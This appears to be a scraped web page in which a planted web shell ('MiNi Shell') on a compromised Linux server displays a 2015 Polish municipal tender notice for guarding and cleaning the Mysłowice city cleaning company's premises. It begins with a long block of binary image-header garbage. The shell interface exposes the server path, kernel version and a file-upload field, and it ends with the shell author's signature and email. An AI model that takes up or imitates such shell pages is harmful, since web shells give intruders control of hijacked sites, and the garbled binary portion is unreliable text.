JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151231/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151231/360464-N-2015.html

<p class="kh_header"><b>Mysłowice: Świadczenie usługi ochrony mienia i sprzątania pomieszczeń należących do Zakładu Oczyszczania Miasta Sp. z o.o. w Mysłowicach</b><br>
<b>Numer ogłoszenia: 360464 - 2015; data zamieszczenia: 31.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Oczyszczania Miasta Sp. z o.o. , ul. Stadionowa 11, 41-400 Mysłowice, woj. śląskie, tel. 32 2226043, faks 32 2221140.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zomm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Podmiot prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi ochrony mienia i sprzątania pomieszczeń należących do Zakładu Oczyszczania Miasta Sp. z o.o. w Mysłowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowa charakterystyka przedmiotu zamówienia
Do przetargu mogą przystąpić Wykonawcy, którzy zagwarantują realizację przedmiotu zamówienia na warunkach określonych w Specyfikacji Istotnych Warunków Zamówienia.
Świadczenie usługi ochrony mienia i sprzątania pomieszczeń należących do Zakładu Oczyszczania Miasta Sp. z o.o. w Mysłowicach
Przedmiotem usługi ochrony mienia i sprzątania są obiekty znajdujące się w następujących lokalizacjach (zwane dalej: Obiektami): siedziba Zarządu, położona w Mysłowicach przy ul. Stadionowej 11, Zaplecze Techniczne położone w Mysłowicach przy ul. K. Miarki 38.
Wykonawca zobowiązany jest do zatrudnienia przynajmniej 30% osób wykonujących przedmiot zamówienia określony w pkt A i B poniżej na podstawie umowy o pracę.
A.  USŁUGA OCHRONY
I. Zakres czynności pracownika ochrony świadczącego usługę całodobowej ochrony siedziby   
  Zarządu Zakładu Oczyszczania Miasta Sp. z o.o. przy ul. Stadionowej 11 w Mysłowicach i Zaplecza Technicznego ZOM Sp. z o. w Mysłowicach przy ul. K. Miarki 38 
1. 	Usługa ochrony obejmuje Obiekty, stanowiące własność Zakładu Oczyszczania Miasta Sp. z o.o.. Usługa jest świadczona całodobowo przez 7 dni w tygodniu i obejmuje również obowiązek powiadamiania odpowiednich służb o szczególnych zagrożeniach. Za szczególne zagrożenia uznaje się w szczególności, ale nie tylko:
	pożar i inne zdarzenia losowe na terenie chronionych obiektów,
	kradzież z włamaniem, wybuch lub zagrożenie wybuchem w obiekcie chronionym,
	terroryzm,
	rabunek w obiekcie chronionym,
	inne zdarzenie związane ze zniszczeniem lub uszkodzeniem mienia oraz zaistnienie ryzyka wystąpienia powyżej wskazanych zdarzeń.
2. 	Usługa ochrony obejmuje okresowe patrolowanie danego Obiektu i sprawdzanie zabezpieczeń zewnętrznych w takich odstępach czasowych, które zgodnie z doświadczeniem Wykonawcy, umożliwiają należyte zabezpieczenie Obiektu przed ryzykami, o których mowa w ust. 1 powyżej. Okresowe patrolowanie danego Obiektu powinno następować nie rzadziej niż co godzinę.
3.	Usługa ochrony obejmuje zapewnienie całodobowego patrolu interwencyjnego w przypadku wystąpienia lub możliwości wystąpienia zagrożeń wskazanych w lit. A pkt. 1
4. 	Pracownicy Wykonawcy zatrudnieni do ochrony obiektów muszą posiadać znajomość urządzeń i zamontowanych systemów alarmowych. Szkolenie w tym zakresie przeprowadzi przedstawiciel Zamawiającego po rozstrzygnięciu przetargu.
5.	Wykonawca w ramach świadczonej usługi ochrony zobowiązuje się zapewnić w każdym czasie  przez całą dobę przez cały tydzień minimum 1 pracownika Wykonawcy dla każdego Obiektu. 
6.	Obiekt przy ul. Stadionowej 11 jest wyposażony w przeciwwłamaniowy system alarmowy.
7. Teren Zaplecza Technicznego monitorowany jest przez 16 kamer telewizji przemysłowej i wyposażony w alarmowy system antynapadowy.
II. Do podstawowych obowiązków pracownika ochrony na stanowisku w danym Obiekcie należy:
1)	pełna znajomość rozkładu budynków i obiektów chronionych oraz rozmieszczenia poszczególnych pomieszczeń,
2)	pełna znajomość rozmieszczenia i obsługi w podstawowym zakresie wyłączników głównych: energii elektrycznej, zaworów wodnych, wyłączników systemów antywłamaniowych i przeciwpożarowych, itp.,
3)	pełna znajomość rozmieszczenia urządzeń gaśniczych (hydranty, gaśnice) i innych instalacji wpływających na stan bezpieczeństwa ppoż.,
4)	zapoznanie się i przestrzeganie regulaminów i instrukcji obowiązujących w chronionym obiekcie w zakresie planów ewakuacyjnych, BHP i ppoż.,
5)	prowadzenie monitoringu sygnałów przesyłanych, gromadzonych i przetwarzanych 
w elektronicznych urządzeniach i systemach alarmowych,
6)	ochrona obiektu przed włamaniem, zniszczeniem i kradzieżą mienia,
7)	nadzorowanie (kontrolowanie) ruchu osobowego interesantów celem zapewnienia porządku i spokoju w budynku,
8)	ogólna znajomość zadań i zagadnień realizowanych przez Zakład Oczyszczania Miasta Sp. z o.o.,
9)	znajomość numerów telefonów do poszczególnych działów Zakład Oczyszczania Miasta Sp. z o.o.,
10)	znajomość położenia i numerów telefonów do ważniejszych instytucji znajdujących na terenie miasta Mysłowice,
11)	udzielenie w sposób uprzejmy i wyczerpujący rzetelnych informacji interesantom 
w zakresie wymienionym w pkt. 8-10,
12)	sprawowanie kontroli (poprzez zapytanie) nad legalnością wynoszenia z budynku sprzętu, materiałów i dokumentów,
13)	sprawowanie kontroli nad infrastrukturą obiektu oraz zapobieganie przed dewastacją i uszkodzeniem mienia, wewnątrz i na zewnątrz chronionego obiektu,
14)	zamykanie i otwieranie wszystkich wejść do budynku,
15)	nadzorowanie i kontrola ruchu pojazdów w obrębie chronionego obiektu 
w szczególności dotyczącego wjazdu i wyjazdu na parking,
16)	informowanie interesantów o położeniu poszczególnych pomieszczeń i sposobie poruszania się po obiekcie,	
17)	udzielanie w razie potrzeby pomocy w poruszaniu się osobom potrzebującym
 i niepełnosprawnym,
18)	gospodarka kluczami: wydawanie, przyjmowanie, odnotowywanie czasu ich pobrania i zdawania (wyłącznie osobom do tego uprawnionym),
19)	sprawdzanie po godzinach pracy stanu zabezpieczeń obiektów i ich pomieszczeń, ze szczególnym zwróceniem uwagi na zamknięcie drzwi i okien, zaworów wody  w sanitariatach, oświetlenie i system ogrzewania,
20)	obserwacja i ochrona obiektu przed zagrożeniami (zalaniem, pożarem, kradzieżą zniszczeniem lub innymi zdarzeniami losowymi),
21)	wykonywanie obchodów chronionego Obiektu przynajmniej 1 razy w ciągu godziny i odnotować ten fakt w książce raportów,
22)	prowadzenie dokumentacji służbowej związanej z tokiem pełnionej służby (książka raportów),
23)	dbanie o porządek i ład w obrębie pełnionego posterunku,
24)	zgłaszanie administratorowi budynku wszelkich zauważonych nieprawidłowości dotyczących funkcjonowania i bezpieczeństwa na obiekcie,
25)	wykonywanie poleceń Zamawiającego związanych z należytym wykonaniem umowy,
26)	w czasie opadów śniegu przed zakończeniem pracy odśnieżnie ścieżki umożliwiającej swobodne dojście do drzwi wejściowych oraz schodów w budynku Zarządu,
Ponadto, w przypadku:	
1)	stwierdzenia kradzieży lub próby jej dokonania dążyć do ujęcia sprawców jeśli nie pociąga to za sobą ryzyka utraty zdrowia lub życia, przekazania Policji i zabezpieczenia miejsca zdarzenia przed zatarciem śladów przestępstwa,
2)	stwierdzenia działań mających na celu naruszenie bezpieczeństwa i porządku oraz w przypadku stwierdzenia braku uprawnień do przebywania na terenie chronionego obiektu pracownik Wykonawcy zobowiązany jest wezwać do opuszczenia obiektu, a w przypadku oporu wezwać policję,
3)	wystąpienia symptomów zagrożenia zdarzeniami losowymi (np. pożar, zalanie) należy dążyć do ograniczenia zagrożenia poprzez zawiadomienie odpowiednich służb ratowniczych, administratora budynku, przełożonego oraz Policję, zabezpieczyć miejsce zdarzenia we własnym zakresie celem udaremnienia dalszego rozprzestrzeniania,	.
4)	zauważenia u osób przebywających na terenie podlegającym ochronie bezpośredniego zagrożenia zdrowia lub życia (wypadek, zdarzenie), pracownik Wykonawcy zobowiązany jest zawiadomić służby ratownicze, administratora budynku i udzielać pierwszej pomocy do czasu przyjazdu pogotowia.
Pracownicy Wykonawcy wykonujący usługę ochrony na terenie Zaplecza Technicznego 
w Mysłowicach na ul. K. Miarki 38 muszą dodatkowo obsługiwać przyzakładową kotłownię i posiadać uprawnienia do obsługi kotłów wodnych o temp. 1000C i mocy
0,4 MW na paliwa stałe.
III. Do podstawowych obowiązków pracownika obsługującego kotłownię należy:
1.	Utrzymanie właściwej temperatury czynnika grzewczego ustalonej przez Zamawiającego,
2.	Czyszczenie i konserwacja kotłów, 
3.	Bieżące czyszczenie palenisk oraz gromadzenie odpadów we wskazanym przez Zamawiającego miejscu,
4.	Bieżąca kontrola urządzeń pomiarowych zainstalowanych w budynku kotłowni oraz na sieci c.o.,
5.	Niezwłoczne zgłaszanie wszelkich nieprawidłowości w funkcjonowaniu urządzeń 
i instalacji c.o.,
6.	Utrzymanie czystości i porządku w obiekcie kotłowni i składzie opałowym,
7.	Zabezpieczenie budynku kotłowni i składu opału przed dostępem osób nieuprawnionych. 
B.  USŁUGA SPRZĄTANIA
I.	Zakres czynności pracownika Wykonawcy świadczącego usługi kompleksowego utrzymania czystości siedziby Zarządu Zakładu Oczyszczania Miasta Sp. z o.o. przy ul. Stadionowej 11 w Mysłowicach i Zaplecza Technicznego ZOM Sp. z o. w Mysłowicach przy ul. K. Miarki 38 w Mysłowicach. 
1. 	Sprzątanie pomieszczeń obejmuje:
a)  sprzątanie pomieszczeń biurowych, socjalnych, gospodarczych, archiwum, portierni, WC, łaźni, szatni:  
Czynności do wykonania codziennie:
	sprzątanie pomieszczeń biurowych
	odkurzanie wykładzin
	odkurzanie mebli
	ścieranie kurzu z monitorów
	opróżnianie koszy na śmieci i wymiana worków na odpady
	mycie podłóg
	mycie drzwi
	mycie WC, czyszczenie i dezynfekcja urządzeń sanitarnych
	mycie luster
	uzupełnianie pojemników na mydło, ręczniki i papier toaletowy
	mycie i sprzątanie szatni
	mycie szklanych powierzchni drzwi zewnętrznych i wewnętrznych
czyszczenie wycieraczek z kurzu i piasku
Czynności do wykonania 1 raz w miesiącu:
	usuwanie pajęczyn
	mycie ścian wykładanych glazurą (pomieszczenia sanitarne i socjalne)
	mycie drzwi wraz z ościeżnicami
	mycie szafek ubraniowych w szatniach
Czynności do wykonania 1 raz na kwartał:
	mycie okien
	mycie grzejników
Osoba realizująca sprzątanie pomieszczeń przy ul. K. Miarki dodatkowo będzie obsługiwać przyzakładową pralnie odzieży roboczej i ochronnej.
Usługi sprzątania realizowane będą: 
 na terenie Zaplecza Technicznego w godzinach 1300 - 2100 
 w budynku Zarządu w godzinach 1500 - 1900
Uwagi:
w sytuacjach wyjątkowych lub w trakcie prac remontowych w obiekcie Wykonawca powinien być dyspozycyjny zarówno w dni tygodnia jak również w dni wolne od pracy 
 po zakończeniu pracy w danym pokoju osoba sprzątająca jest zobowiązana do zamknięcia okien, zgaszenia światła oraz sprawdzenia zabezpieczeń pokoju (zamknięcia zamków okien i pokoju),
 osoba sprzątająca zobowiązana jest do zgłaszania na bieżąco Zamawiającemu uszkodzeń sprzętu, wszelkich usterek i awarii poprzez dokonywanie stosownego wpisu do książki zgłoszeń znajdującej się w punkcie ochrony budynku oraz doraźnego zabezpieczenia uszkodzonego sprzętu lub mienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 PZP do 50%.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 90.91.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.01.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>usługa sprzątania, usługa ochrony mienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>świadectwa kwalifikacyjne uprawniające do obsługi kotłów wodnych do 100 stopni C i mocy 0,4MW na paliwo stałe, rekomendacje PIOiH, zaświadczenia np. Gwarant Czystości</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Doświadczenie - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zomm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Mysłowice, Stadionowa 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.01.2016 godzina 09:00, miejsce: Mysłowice, Stadionowa 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com